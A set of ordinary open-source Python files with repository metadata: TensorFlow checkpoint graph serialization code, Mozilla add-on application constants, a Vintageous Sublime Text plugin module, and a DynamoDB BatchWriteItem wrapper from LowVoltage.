      object_names: Maps each trackable to its checkpoint name prefix.
      object_map: Optional substitution map; when present, saveables are
        created for `object_map.get(trackable, trackable)` instead of the
        trackable itself.

    Returns:
      A tuple (named_saveable_objects, feed_additions). feed_additions is
      None when saveable caching is disabled (see below).
    """
    named_saveable_objects = []
    if self._saveables_cache is None:
        # No SaveableObject caching. Either we're executing eagerly, or building a
        # static save which is specialized to the current Python state.
        feed_additions = None
    else:
        # If we are caching SaveableObjects, we need to build up a feed_dict with
        # functions computing volatile Python state to be saved with the
        # checkpoint.
        feed_additions = {}
    for checkpoint_id, (trackable, object_proto) in enumerate(
            zip(trackable_objects, object_graph_proto.nodes)):
        assert node_ids[trackable] == checkpoint_id
        object_name = object_names[trackable]
        if object_map is None:
            object_to_save = trackable
        else:
            object_to_save = object_map.get(trackable, trackable)
        if self._saveables_cache is not None:
            cached_attributes = self._saveables_cache.setdefault(object_to_save, {})
        else:
            cached_attributes = None
        for name, saveable_factory in (
                object_to_save._gather_saveables_for_checkpoint().items()):  # pylint: disable=protected-access
            attribute = object_proto.attributes.add()
            attribute.name = name
            attribute.checkpoint_key = "%s/%s/%s" % (
                object_name, _OBJECT_ATTRIBUTES_NAME, _escape_local_name(name))
            # Try to reuse cached saveables; invalidate the cache entry if the
            # checkpoint key has changed since the saveable was created.
            if cached_attributes is None:
                saveables = None
            else:
                saveables = cached_attributes.get(name, None)
                if saveables is not None:
                    for saveable in saveables:
                        if attribute.checkpoint_key not in saveable.name:
                            # The checkpoint key for this SaveableObject is different. We
                            # need to re-create it.
                            saveables = None
                            del cached_attributes[name]
                            break
            if saveables is None:
                # No usable cached saveable; build one from the factory.
                if callable(saveable_factory):
                    maybe_saveable = saveable_factory(name=attribute.checkpoint_key)
                else:
                    maybe_saveable = saveable_factory
                if isinstance(maybe_saveable, saveable_object_lib.SaveableObject):
                    saveables = (maybe_saveable,)
                else:
                    # Figure out the name-based Saver's name for this variable. If it's
                    # already a SaveableObject we'd just get the checkpoint key back, so
                    # we leave full_name blank.
                    saver_dict = saveable_object_util.op_list_to_dict(
                        [maybe_saveable], convert_variable_to_tensor=False)
                    full_name, = saver_dict.keys()
                    saveables = tuple(saveable_object_util.saveable_objects_for_op(
                        op=maybe_saveable, name=attribute.checkpoint_key))
                    for saveable in saveables:
                        saveable.full_name = full_name
                for saveable in saveables:
                    if attribute.checkpoint_key not in saveable.name:
                        raise AssertionError(
                            ("The object %s produced a SaveableObject with name '%s' for "
                             "attribute '%s'. Expected a name containing '%s'.")
                            % (trackable, name, saveable.name,
                               attribute.checkpoint_key))
                if cached_attributes is not None:
                    cached_attributes[name] = saveables
            # optional_restore for the attribute is the AND over its saveables.
            optional_restore = None
            for saveable in saveables:
                if optional_restore is None:
                    optional_restore = saveable.optional_restore
                else:
                    optional_restore = optional_restore and saveable.optional_restore
                if hasattr(saveable, "full_name"):
                    attribute.full_name = saveable.full_name
                if isinstance(saveable, base.PythonStateSaveable):
                    if feed_additions is None:
                        assert self._saveables_cache is None
                        # If we're not caching saveables, then we're either executing
                        # eagerly or building a static save/restore (e.g. for a
                        # SavedModel). In either case, we should embed the current Python
                        # state in the graph rather than relying on a feed dict.
                        saveable = saveable.freeze()
                    else:
                        saveable_feed_dict = saveable.feed_dict_additions()
                        for new_feed_key in saveable_feed_dict.keys():
                            if new_feed_key in feed_additions:
                                raise AssertionError(
                                    ("The object %s tried to feed a value for the Tensor %s "
                                     "when saving, but another object is already feeding a "
                                     "value.")
                                    % (trackable, new_feed_key))
                        feed_additions.update(saveable_feed_dict)
                named_saveable_objects.append(saveable)
            if optional_restore is None:
                optional_restore = False
            attribute.optional_restore = optional_restore
    return named_saveable_objects, feed_additions
def _fill_object_graph_proto(self, trackable_objects,
                             node_ids,
                             slot_variables,
                             object_graph_proto=None):
    """Name non-slot `Trackable`s and add them to `object_graph_proto`."""
    if object_graph_proto is None:
        object_graph_proto = trackable_object_graph_pb2.TrackableObjectGraph()
    for checkpoint_id, trackable in enumerate(trackable_objects):
        # Node order in the proto must match the checkpoint ids computed
        # earlier.
        assert node_ids[trackable] == checkpoint_id
        node_proto = object_graph_proto.nodes.add()
        node_proto.slot_variables.extend(slot_variables.get(trackable, ()))
        for reference in self.list_dependencies(trackable):
            child_proto = node_proto.children.add()
            child_proto.node_id = node_ids[reference.ref]
            child_proto.local_name = reference.name
    return object_graph_proto
def _serialize_gathered_objects(self, trackable_objects, path_to_root,
                                object_map=None):
    """Create SaveableObjects and protos for gathered objects."""
    # Derive checkpoint names from shortest paths and assign node ids by
    # breadth-first position.
    object_names = object_identity.ObjectIdentityDictionary()
    node_ids = object_identity.ObjectIdentityDictionary()
    for obj, path in path_to_root.items():
        object_names[obj] = _object_prefix_from_path(path)
    for index, obj in enumerate(trackable_objects):
        node_ids[obj] = index
    slot_variables = _serialize_slot_variables(
        trackable_objects=trackable_objects,
        node_ids=node_ids,
        object_names=object_names)
    graph_proto = self._fill_object_graph_proto(
        trackable_objects=trackable_objects,
        node_ids=node_ids,
        slot_variables=slot_variables)
    saveables, feed_additions = self._add_attributes_to_object_graph(
        trackable_objects=trackable_objects,
        object_graph_proto=graph_proto,
        node_ids=node_ids,
        object_names=object_names,
        object_map=object_map)
    return saveables, graph_proto, feed_additions
def serialize_object_graph(self):
    """Determine checkpoint keys for variables and build a serialized graph.

    Non-slot variables are keyed by a shortest path from the root saveable to
    the object which owns the variable (i.e. the one which called
    `Trackable._add_variable` to create it). Slot variables are keyed by a
    shortest path to the variable being slotted for, a shortest path to their
    optimizer, and the slot name.

    Returns:
      A tuple of (named_variables, object_graph_proto, feed_additions):
        named_variables: A dictionary mapping names to variable objects.
        object_graph_proto: A TrackableObjectGraph protocol buffer containing
          the serialized object graph and variable references.
        feed_additions: A dictionary mapping from Tensors to values which
          should be fed when saving.

    Raises:
      ValueError: If there are invalid characters in an optimizer's slot
        names.
    """
    objects, paths = self._breadth_first_traversal()
    return self._serialize_gathered_objects(objects, paths)
def frozen_saveable_objects(self, object_map=None, to_graph=None):
    """Creates SaveableObjects with the current object graph frozen.

    Args:
      object_map: Optional substitution map passed through to
        `_serialize_gathered_objects`.
      to_graph: Optional graph to build the saveables in; defaults to the
        current context.

    Returns:
      The list of SaveableObjects, with a NoRestoreSaveable holding the
      serialized object graph proto appended.
    """
    trackable_objects, path_to_root = self._breadth_first_traversal()
    if to_graph:
        target_context = to_graph.as_default
    else:
        target_context = ops.NullContextmanager
    with target_context():
        named_saveable_objects, graph_proto, _ = self._serialize_gathered_objects(
            trackable_objects,
            path_to_root,
            object_map)
        # Pin the serialized graph proto constant to CPU.
        with ops.device("/cpu:0"):
            object_graph_tensor = constant_op.constant(
                graph_proto.SerializeToString(), dtype=dtypes.string)
        named_saveable_objects.append(
            base.NoRestoreSaveable(
                tensor=object_graph_tensor,
                name=base.OBJECT_GRAPH_PROTO_KEY))
    return named_saveable_objects
def objects_ids_and_slot_variables(self):
    """Traverse the object graph and list all accessible objects.

    Looks for `Trackable` objects which are dependencies of
    `root_trackable`. Includes slot variables only if the variable they are
    slotting for and the optimizer are dependencies of `root_trackable`
    (i.e. if they would be saved with a checkpoint).

    Returns:
      A tuple of (trackable objects, object -> node id, slot variables)
    """
    trackable_objects, path_to_root = self._breadth_first_traversal()
    object_names = object_identity.ObjectIdentityDictionary()
    node_ids = object_identity.ObjectIdentityDictionary()
    for obj, path in path_to_root.items():
        object_names[obj] = _object_prefix_from_path(path)
    for index, obj in enumerate(trackable_objects):
        node_ids[obj] = index
    slot_variables = _serialize_slot_variables(
        trackable_objects=trackable_objects,
        node_ids=node_ids,
        object_names=object_names)
    return trackable_objects, node_ids, slot_variables
def list_objects(self):
    """Traverse the object graph and list all accessible objects."""
    objects, _, _ = self.objects_ids_and_slot_variables()
    return objects
| {
"content_hash": "2a777a612add02e476cc51603bd0ff7c",
"timestamp": "",
"source": "github",
"line_count": 431,
"max_line_length": 105,
"avg_line_length": 44.0046403712297,
"alnum_prop": 0.6612886217441738,
"repo_name": "ghchinoy/tensorflow",
"id": "ba2387870182cef6e578c7b947f07a4957fdf22c",
"size": "18966",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/tracking/graph_view.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3568"
},
{
"name": "Batchfile",
"bytes": "15317"
},
{
"name": "C",
"bytes": "699905"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "67022491"
},
{
"name": "CMake",
"bytes": "206499"
},
{
"name": "Dockerfile",
"bytes": "73602"
},
{
"name": "Go",
"bytes": "1585039"
},
{
"name": "HTML",
"bytes": "4680118"
},
{
"name": "Java",
"bytes": "836400"
},
{
"name": "Jupyter Notebook",
"bytes": "1665583"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "98194"
},
{
"name": "Objective-C",
"bytes": "94022"
},
{
"name": "Objective-C++",
"bytes": "175222"
},
{
"name": "PHP",
"bytes": "17600"
},
{
"name": "Pascal",
"bytes": "3239"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "48407007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4733"
},
{
"name": "Shell",
"bytes": "476920"
},
{
"name": "Smarty",
"bytes": "27495"
},
{
"name": "Swift",
"bytes": "56155"
}
],
"symlink_target": ""
} |
import re
from django.utils.translation import ugettext_lazy as _
from base import (
ADDON_DICT, ADDON_EXTENSION, ADDON_LPAPP, ADDON_PERSONA, ADDON_PLUGIN,
ADDON_SEARCH, ADDON_STATICTHEME, ADDON_THEME)
from olympia.versions.compare import version_int as vint
class App(object):
    """Base class for application constants.

    Subclasses define identifiers (id, guid, short names), the add-on types
    they accept, and the substring used to recognize them in user agents.
    """

    @classmethod
    def matches_user_agent(cls, user_agent):
        # Plain substring test; subclasses override for trickier UAs.
        return cls.user_agent_string in user_agent
# Applications
class FIREFOX(App):
    # Desktop Firefox.
    id = 1
    shortername = 'fx'
    short = 'firefox'
    pretty = _(u'Firefox')
    browser = True
    # Add-on types this application accepts.
    types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
             ADDON_LPAPP, ADDON_PLUGIN, ADDON_PERSONA, ADDON_STATICTHEME]
    guid = '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}'
    min_display_version = 3.0
    # These versions were relabeled and should not be displayed.
    exclude_versions = (3.1, 3.7, 4.2)
    user_agent_string = 'Firefox'
    platforms = 'desktop'  # DESKTOP_PLATFORMS (set in constants.platforms)

    @classmethod
    def matches_user_agent(cls, user_agent):
        # Mobile Firefox UAs also contain 'Firefox'; reject anything that
        # looks mobile so the mobile applications can claim those UAs.
        matches = cls.user_agent_string in user_agent
        if ('Android' in user_agent or 'Mobile' in user_agent or
                'Tablet' in user_agent):
            matches = False
        return matches
class THUNDERBIRD(App):
    # Mozilla's mail/news client.
    id = 18
    short = 'thunderbird'
    shortername = 'tb'
    pretty = _(u'Thunderbird')
    browser = False
    # Add-on types this application accepts.
    types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_LPAPP,
             ADDON_PERSONA]
    guid = '{3550f703-e582-4d05-9a08-453d09bdfdc6}'
    min_display_version = 1.0
    user_agent_string = 'Thunderbird'
    platforms = 'desktop'  # DESKTOP_PLATFORMS (set in constants.platforms)
class SEAMONKEY(App):
    # The SeaMonkey internet suite.
    id = 59
    short = 'seamonkey'
    shortername = 'sm'
    pretty = _(u'SeaMonkey')
    browser = True
    types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
             ADDON_LPAPP, ADDON_PLUGIN, ADDON_PERSONA]
    guid = '{92650c4d-4b8e-4d2a-b7eb-24ecf4f6b63a}'
    min_display_version = 1.0
    # Versions excluded from display (see exclude_versions handling at the
    # bottom of this module).
    exclude_versions = (1.5,)
    latest_version = None
    user_agent_string = 'SeaMonkey'
    platforms = 'desktop'  # DESKTOP_PLATFORMS (set in constants.platforms)
class SUNBIRD(App):
    """This application is retired and should not be used on the site. It
    remains as there are still some sunbird add-ons in the db."""
    id = 52
    short = 'sunbird'
    shortername = 'sb'
    pretty = _(u'Sunbird')
    browser = False
    types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_LPAPP]
    guid = '{718e30fb-e89b-41dd-9da7-e25a45638b28}'
    min_display_version = 0.2
    latest_version = None
    user_agent_string = 'Sunbird'
    platforms = 'desktop'  # DESKTOP_PLATFORMS (set in constants.platforms)
class MOBILE(App):
    """Old Firefox for Mobile.

    Not supported anymore, should not be added to APPS."""
    id = 60
    short = 'mobile'
    shortername = 'fn'
    pretty = _(u'Mobile')
    browser = True
    types = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH,
             ADDON_LPAPP, ADDON_PERSONA]
    guid = '{a23983c0-fd0e-11dc-95ff-0800200c9a66}'
    min_display_version = 0.1
    user_agent_string = 'Fennec'
    # NOTE: comment previously said DESKTOP_PLATFORMS (copy-paste leftover).
    platforms = 'mobile'  # MOBILE_PLATFORMS (set in constants.platforms)
class ANDROID(App):
    # This is for the Android native Firefox.
    id = 61
    short = 'android'
    shortername = 'an'
    pretty = _(u'Firefox for Android')
    browser = True
    types = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH,
             ADDON_LPAPP, ADDON_PERSONA]
    guid = '{aa3c5121-dab2-40e2-81ca-7ea25febc110}'
    min_display_version = 11.0
    user_agent_string = 'Fennec'
    # Mobile and Android have the same user agent. The only way to distinguish
    # is by the version number. Raw strings so '\d' is a regex class rather
    # than a (deprecated) string escape.
    user_agent_re = [re.compile(r'Fennec/([\d.]+)'),
                     re.compile(r'Android; Mobile; rv:([\d.]+)'),
                     re.compile(r'Android; Tablet; rv:([\d.]+)'),
                     re.compile(r'Mobile; rv:([\d.]+)'),
                     re.compile(r'Tablet; rv:([\d.]+)')]
    platforms = 'mobile'
    latest_version = None

    @classmethod
    def matches_user_agent(cls, user_agent):
        # The first pattern that matches decides: the UA is ours only if the
        # captured version is at least min_display_version. Previously this
        # fell through returning None when nothing matched; return an
        # explicit (still falsy) False instead.
        for pattern in cls.user_agent_re:
            match = pattern.search(user_agent)
            if match:
                version = match.groups()[0]
                return vint(cls.min_display_version) <= vint(version)
        return False
class MOZILLA(App):
    """Mozilla exists for completeness and historical purposes.

    Stats and other modules may reference this for history.
    This should NOT be added to APPS.
    """
    id = 2
    short = 'mz'
    shortername = 'mz'
    pretty = _(u'Mozilla')
    browser = True
    types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
             ADDON_LPAPP, ADDON_PLUGIN]
    guid = '{86c18b42-e466-45a9-ae7a-9b95ba6f5640}'
    platforms = 'desktop'  # DESKTOP_PLATFORMS (set in constants.platforms)
class UNKNOWN_APP(App):
    """Placeholder for unknown applications."""
    # Only a display name; no id/guid/types are defined here.
    pretty = _(u'Unknown')
# UAs will attempt to match in this order.
APP_DETECT = (ANDROID, THUNDERBIRD, SEAMONKEY, FIREFOX)
APP_USAGE = (FIREFOX, THUNDERBIRD, ANDROID, SEAMONKEY)
APP_USAGE_STATICTHEME = (FIREFOX,)
# Lookup tables over the supported applications, keyed by the various ids.
APPS = {app.short: app for app in APP_USAGE}
APPS_ALL = {app.id: app for app in APP_USAGE + (MOZILLA, SUNBIRD, MOBILE)}
APP_IDS = {app.id: app for app in APP_USAGE}
APP_GUIDS = {app.guid: app for app in APP_USAGE}
APPS_CHOICES = tuple((app.id, app.pretty) for app in APP_USAGE)
# Maps add-on type -> list of applications supporting that type.
APP_TYPE_SUPPORT = {}
for _app in APP_USAGE:
    for _type in _app.types:
        APP_TYPE_SUPPORT.setdefault(_type, []).append(_app)
# Fake max version for when we want max compatibility
FAKE_MAX_VERSION = '9999'
# The lowest maxVersion an app has to support to allow default-to-compatible.
D2C_MIN_VERSIONS = {
    FIREFOX.id: '4.0',
    SEAMONKEY.id: '2.1',
    THUNDERBIRD.id: '5.0',
    ANDROID.id: '11.0',
}
for _app in APPS_ALL.values():
    _versions = list(getattr(_app, 'exclude_versions', []))
    # 99 comes from the hacks we do to make search tools compatible with
    # versions (bug 692360).
    _versions.append(99)
    _app.exclude_versions = tuple(_versions)
# Don't leak the loop temporaries into the module namespace.
del _app, _type, _versions
| {
"content_hash": "99a97d18e103e05e581fa7c3aa0b2343",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 78,
"avg_line_length": 32.239583333333336,
"alnum_prop": 0.6411954765751212,
"repo_name": "harry-7/addons-server",
"id": "255578f4287b3efe14b56bf0527a06b27109297f",
"size": "6190",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/olympia/constants/applications.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "806148"
},
{
"name": "HTML",
"bytes": "673309"
},
{
"name": "JavaScript",
"bytes": "1066531"
},
{
"name": "Makefile",
"bytes": "821"
},
{
"name": "PLSQL",
"bytes": "1074"
},
{
"name": "PLpgSQL",
"bytes": "2381"
},
{
"name": "Python",
"bytes": "4647485"
},
{
"name": "SQLPL",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "9339"
},
{
"name": "Smarty",
"bytes": "1881"
}
],
"symlink_target": ""
} |
"""Assorted commands.
"""
import os
import threading
import sublime
import sublime_plugin
from Vintageous.state import _init_vintageous
from Vintageous.state import State
from Vintageous.vi import settings
from Vintageous.vi import cmd_defs
from Vintageous.vi.dot_file import DotFile
from Vintageous.vi.utils import modes
from Vintageous.vi.utils import regions_transformer
class _vi_slash_on_parser_done(sublime_plugin.WindowCommand):
    """Finalize a '/' (search forward) motion once its input is complete."""

    def run(self, key=None):
        view = self.window.active_view()
        state = State(view)
        state.motion = cmd_defs.ViSearchForwardImpl()
        # An empty pattern repeats the previous buffer search.
        typed = state.motion._inp
        state.last_buffer_search = typed if typed else state.last_buffer_search
class _vi_question_mark_on_parser_done(sublime_plugin.WindowCommand):
    """Finalize a '?' (search backward) motion once its input is complete."""

    def run(self, key=None):
        view = self.window.active_view()
        state = State(view)
        state.motion = cmd_defs.ViSearchBackwardImpl()
        # An empty pattern repeats the previous buffer search.
        typed = state.motion._inp
        state.last_buffer_search = typed if typed else state.last_buffer_search
# TODO: Test me.
class VintageStateTracker(sublime_plugin.EventListener):
    """Keep Vintageous state in sync with view lifecycle events."""

    def on_post_save(self, view):
        # Carets may land out of bounds after save hooks such as
        # `trim_trailing_white_space_on_save`; nudge them back in range.
        view.run_command('_vi_adjust_carets', {'mode': State(view).mode})

    def on_query_context(self, view, key, operator, operand, match_all):
        return State(view).context.check(key, operator, operand, match_all)

    def on_close(self, view):
        settings.destroy(view)
class ViMouseTracker(sublime_plugin.EventListener):
    """Intercepts 'drag_select' so mouse clicks cooperate with vi modes."""

    def on_text_command(self, view, command, args):
        if command == 'drag_select':
            state = State(view)
            if state.mode in (modes.VISUAL, modes.VISUAL_LINE,
                              modes.VISUAL_BLOCK):
                if (args.get('extend') or (args.get('by') == 'words') or
                        args.get('additive')):
                    # Let Sublime handle extending/word/additive drags as-is.
                    return
                elif not args.get('extend'):
                    # Plain click while in a visual mode: run the drag, then
                    # drop back to normal mode.
                    return ('sequence', {'commands': [
                        ['drag_select', args], ['_enter_normal_mode', {
                            'mode': state.mode}]
                    ]})
            elif state.mode == modes.NORMAL:
                # TODO(guillermooo): Dragging the mouse does not seem to
                # fire a different event than simply clicking. This makes it
                # hard to update the xpos.
                if args.get('extend') or (args.get('by') == 'words'):
                    # Extending drags from normal mode enter visual mode.
                    return ('sequence', {'commands': [
                        ['drag_select', args], ['_enter_visual_mode', {
                            'mode': state.mode}]
                    ]})
# TODO: Test me.
class ViFocusRestorerEvent(sublime_plugin.EventListener):
    """Re-enter normal mode when focus moves between views, but not when
    merely switching back from another application."""

    def __init__(self):
        self.timer = None

    def action(self):
        self.timer = None

    def on_activated(self, view):
        if self.timer is None:
            # Reactivated from another application; leave the state alone.
            return
        # Switching to a different view; enter normal mode.
        self.timer.cancel()
        _init_vintageous(view)

    def on_deactivated(self, view):
        self.timer = threading.Timer(0.25, self.action)
        self.timer.start()
class _vi_adjust_carets(sublime_plugin.TextCommand):
    """Pulls carets off a trailing newline / EOF in normal-like modes."""

    def run(self, edit, mode=None):
        def f(view, s):
            if mode in (modes.NORMAL, modes.INTERNAL_NORMAL):
                # Step one character back when the caret sits on the newline
                # (or at EOF) of a non-empty line.
                if ((view.substr(s.b) == '\n' or s.b == view.size())
                        and not view.line(s.b).empty()):
                    return sublime.Region(s.b - 1)
            return s
        regions_transformer(self.view, f)
class Sequence(sublime_plugin.TextCommand):
    """Run a list of (command, args) pairs against this view.

    Required so that mark_undo_groups_for_gluing and friends work.
    """

    def run(self, edit, commands):
        for name, arguments in commands:
            self.view.run_command(name, arguments)
class ResetVintageous(sublime_plugin.WindowCommand):
    """Wipe the active view's Vintageous state and reload the user rc file."""

    def run(self):
        view = self.window.active_view()
        view.settings().erase('vintage')
        _init_vintageous(view)
        DotFile.from_user().run()
        print("Package.Vintageous: State reset.")
        sublime.status_message("Vintageous: State reset")
class ForceExitFromCommandMode(sublime_plugin.WindowCommand):
    """
    A sort of a panic button.
    """

    def run(self):
        prefs = self.window.active_view().settings()
        prefs.erase('vintage')
        # XXX: What happens exactly when the user presses Esc again now?
        # Which mode are we in?
        prefs.set('command_mode', False)
        prefs.set('inverse_caret_state', False)
        print("Vintageous: Exiting from command mode.")
        sublime.status_message("Vintageous: Exiting from command mode.")
class VintageousToggleCtrlKeys(sublime_plugin.WindowCommand):
    """Flip the `vintageous_use_ctrl_keys` preference and persist it."""

    def run(self):
        prefs = sublime.load_settings('Preferences.sublime-settings')
        use_ctrl = not prefs.get('vintageous_use_ctrl_keys', False)
        prefs.set('vintageous_use_ctrl_keys', use_ctrl)
        sublime.save_settings('Preferences.sublime-settings')
        status = 'enabled' if use_ctrl else 'disabled'
        print("Package.Vintageous: Use of Ctrl- keys {0}.".format(status))
        sublime.status_message("Vintageous: Use of Ctrl- keys {0}"
                               .format(status))
class ReloadVintageousSettings(sublime_plugin.TextCommand):
    """Re-run the user's .vintageousrc file."""

    def run(self, edit):
        DotFile.from_user().run()
class VintageousOpenConfigFile(sublime_plugin.WindowCommand):
    """Opens or creates $packages/User/.vintageousrc.
    """

    def run(self):
        path = os.path.realpath(
            os.path.join(sublime.packages_path(), 'User/.vintageousrc'))
        if not os.path.exists(path):
            # Create an empty rc file so open_file has something to show.
            with open(path, 'w'):
                pass
        self.window.open_file(path)
| {
"content_hash": "c0470cf05d169d017bb860d79b3ca3fe",
"timestamp": "",
"source": "github",
"line_count": 188,
"max_line_length": 78,
"avg_line_length": 32.1436170212766,
"alnum_prop": 0.597385404600364,
"repo_name": "vastcharade/Vintageous",
"id": "d183d123a999b015bfbb76065154e64996400405",
"size": "6043",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "xsupport.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "4212"
},
{
"name": "Python",
"bytes": "970962"
},
{
"name": "Shell",
"bytes": "657"
}
],
"symlink_target": ""
} |
"""
When given a :class:`BatchWriteItem`, the connection will return a :class:`BatchWriteItemResponse`:
>>> connection(
... BatchWriteItem().table(table).delete({"h": 0}, {"h": 1})
... )
<LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
See also the :func:`.batch_put_item` and :func:`.batch_delete_item` compounds. And :ref:`actions-vs-compounds` in the user guide.
"""
import LowVoltage as _lv
import LowVoltage.testing as _tst
from .action import Action
from .conversion import _convert_dict_to_db
from .next_gen_mixins import proxy, variadic
from .next_gen_mixins import ReturnConsumedCapacity, ReturnItemCollectionMetrics
from .return_types import ConsumedCapacity, ItemCollectionMetrics, _is_dict, _is_list_of_dict
class BatchWriteItemResponse(object):
    """
    BatchWriteItemResponse()

    The `BatchWriteItem response <http://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchWriteItem.html#API_BatchWriteItem_ResponseElements>`__.
    """

    def __init__(
        self,
        ConsumedCapacity=None,
        ItemCollectionMetrics=None,
        UnprocessedItems=None,
        **dummy
    ):
        # **dummy swallows any extra keys present in the raw response.
        self.__consumed_capacity = ConsumedCapacity
        self.__item_collection_metrics = ItemCollectionMetrics
        self.__unprocessed_items = UnprocessedItems

    @property
    def consumed_capacity(self):
        """
        The capacity consumed by the request. If you used :meth:`~BatchWriteItem.return_consumed_capacity_total` or :meth:`~BatchWriteItem.return_consumed_capacity_indexes`.

        :type: ``None`` or list of :class:`.ConsumedCapacity`
        """
        # Implicitly returns None when the response carried no capacity data.
        if _is_list_of_dict(self.__consumed_capacity):
            return [ConsumedCapacity(**c) for c in self.__consumed_capacity]

    @property
    def item_collection_metrics(self):
        """
        Metrics about the collection of the items you just updated. If a LSI was touched and you used :meth:`~BatchWriteItem.return_item_collection_metrics_size`.

        :type: ``None`` or dict of string (table name) to list of :class:`.ItemCollectionMetrics`
        """
        if _is_dict(self.__item_collection_metrics):
            return {n: [ItemCollectionMetrics(**m) for m in v] for n, v in self.__item_collection_metrics.iteritems()}

    @property
    def unprocessed_items(self):
        """
        Items that were not processed during this request.

        If not None, you should give this back to :meth:`~BatchWriteItem.previous_unprocessed_items`
        in a subsequent :class:`BatchWriteItem`.

        The :func:`.batch_put_item` and :func:`.batch_delete_item` compounds do that for you.

        :type: ``None`` or exactly as returned by DynamoDB
        """
        return self.__unprocessed_items
class BatchWriteItem(Action):
    """
    The `BatchWriteItem request <http://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchWriteItem.html#API_BatchWriteItem_RequestParameters>`__.
    """

    def __init__(self, table=None, put=(), delete=()):
        """
        Passing ``table`` (and ``put`` and ``delete``) to the constructor is like calling :meth:`table` on the new instance.
        """
        # Immutable tuple defaults: the previous mutable-list defaults ([])
        # are the classic shared-default-argument pitfall. They are only
        # iterated here, so () is strictly safer and fully compatible.
        super(BatchWriteItem, self).__init__("BatchWriteItem", BatchWriteItemResponse)
        self.__previous_unprocessed_items = None
        self.__tables = {}
        self.__active_table = None
        self.__return_consumed_capacity = ReturnConsumedCapacity(self)
        self.__return_item_collection_metrics = ReturnItemCollectionMetrics(self)
        if table is not None:
            self.table(table, put, delete)

    @property
    def payload(self):
        """The request body built from the current builder state."""
        data = {}
        # Tables configured on this instance take precedence over previous
        # unprocessed items (the second assignment overwrites the first).
        if self.__previous_unprocessed_items:
            data["RequestItems"] = self.__previous_unprocessed_items
        if self.__tables:
            data["RequestItems"] = {n: t.payload for n, t in self.__tables.iteritems()}
        data.update(self.__return_consumed_capacity.payload)
        data.update(self.__return_item_collection_metrics.payload)
        return data

    class _Table(object):
        """Per-table accumulator of items to put and keys to delete."""

        def __init__(self):
            # The previous signature took an unused `action` argument.
            self.delete = []
            self.put = []

        @property
        def payload(self):
            requests = []
            if self.delete:
                requests.extend({"DeleteRequest": {"Key": _convert_dict_to_db(k)}} for k in self.delete)
            if self.put:
                requests.extend({"PutRequest": {"Item": _convert_dict_to_db(i)}} for i in self.put)
            return requests

    def table(self, name, put=(), delete=()):
        """
        Set the active table. Calls to methods like :meth:`delete` or :meth:`put` will apply to this table.

        >>> connection(
        ...   BatchWriteItem().table(table)
        ...     .put({"h": 12}, {"h": 13})
        ... )
        <LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>

        If you pass a list of items as ``put``, they'll be added to the items to put in the table.

        >>> connection(
        ...   BatchWriteItem().table(table, put=[{"h": 12}, {"h": 13}])
        ... )
        <LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>

        If you pass a list of keys as ``delete``, they'll be added to the keys to delete from the table.

        >>> connection(
        ...   BatchWriteItem().table(table, delete=[{"h": 12}, {"h": 13}])
        ... )
        <LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
        """
        if name not in self.__tables:
            self.__tables[name] = self._Table()
        self.__active_table = self.__tables[name]
        self.put(*put)
        self.delete(*delete)
        return self

    @variadic(dict)
    def put(self, *items):
        """
        Add items to put in the active table.

        :raise: :exc:`.BuilderError` if called when no table is active.

        >>> connection(
        ...   BatchWriteItem().table(table)
        ...     .put({"h": 12}, {"h": 13})
        ... )
        <LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
        """
        self.__check_active_table()
        self.__active_table.put.extend(items)
        return self

    @variadic(dict)
    def delete(self, *keys):
        """
        Add keys to delete from the active table.

        :raise: :exc:`.BuilderError` if called when no table is active.

        >>> connection(
        ...   BatchWriteItem().table(table)
        ...     .delete({"h": 12}, {"h": 13})
        ... )
        <LowVoltage.actions.batch_write_item.BatchWriteItemResponse ...>
        """
        self.__check_active_table()
        self.__active_table.delete.extend(keys)
        return self

    def previous_unprocessed_items(self, previous_unprocessed_items):
        """
        Set Table and items to retry previous :attr:`~BatchWriteItemResponse.unprocessed_items`.

        The :func:`.batch_put_item` and :func:`.batch_delete_item` compounds do that for you.

        Note that using this method is incompatible with using :meth:`table`, :meth:`put` or :meth:`delete`
        or passing a ``table`` or ``put`` or ``delete`` in the constructor.
        """
        self.__previous_unprocessed_items = previous_unprocessed_items
        return self

    @proxy
    def return_consumed_capacity_total(self):
        """
        >>> c = connection(
        ...   BatchWriteItem().table(table)
        ...     .delete({"h": 3})
        ...     .return_consumed_capacity_total()
        ... ).consumed_capacity
        >>> c[0].table_name
        u'LowVoltage.Tests.Doc.1'
        >>> c[0].capacity_units
        2.0
        """
        return self.__return_consumed_capacity.total()

    @proxy
    def return_consumed_capacity_indexes(self):
        """
        >>> c = connection(
        ...   BatchWriteItem().table(table)
        ...     .delete({"h": 4})
        ...     .return_consumed_capacity_indexes()
        ... ).consumed_capacity
